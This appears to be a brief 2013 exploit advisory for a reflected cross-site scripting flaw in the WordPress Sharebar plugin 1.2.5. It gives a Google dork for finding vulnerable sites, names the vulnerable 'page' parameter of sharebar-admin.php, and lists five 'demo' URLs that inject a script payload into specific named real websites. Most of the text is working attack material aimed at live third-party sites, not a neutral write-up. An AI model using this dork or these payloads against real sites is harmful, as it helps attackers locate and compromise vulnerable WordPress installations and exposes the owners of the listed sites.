WordPress Sharebar plugin version 1.2.5 suffers from a cross site scripting vulnerability. Note that this advisory has site-specific information.
d28550236ec0587220af38f8654ee2cf9fccb27b1a29c80ead8598c11f6482e4
#######################################################################
# Exploit Title : Wordpress sharebar plugin Cross site scripting
Vulnerability
#
# Exploit Author : Ashiyane Digital Security Team
#
# Google Dork: : inurl:/wp-content/plugins/sharebar
#
# Date: 2013/09/24
#
# Vendor Homepage : http://wordpress.org/plugins/sharebar
#
# Software Link : http://downloads.wordpress.org/plugin/sharebar.zip
#
# Version : 1.2.5
#
# Tested on: Windows
#
##############
#
#Location: Site//wp-content/plugins/sharebar/sharebar-admin.php?page=[xss]
#
##############
##############
# Demo:
#
#
http://www.andreafelder.com/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.buyukanadolutipmerkezi.com/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.baxterbowlingcostarica.com/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.intikala.com/design/KellyTirman/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
#
http://www.kirktalon.com/kirksite2011/wp-content/plugins/sharebar/sharebar-admin.php?page=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
#
##############
#
# Discovered By : ACC3SS
#
##############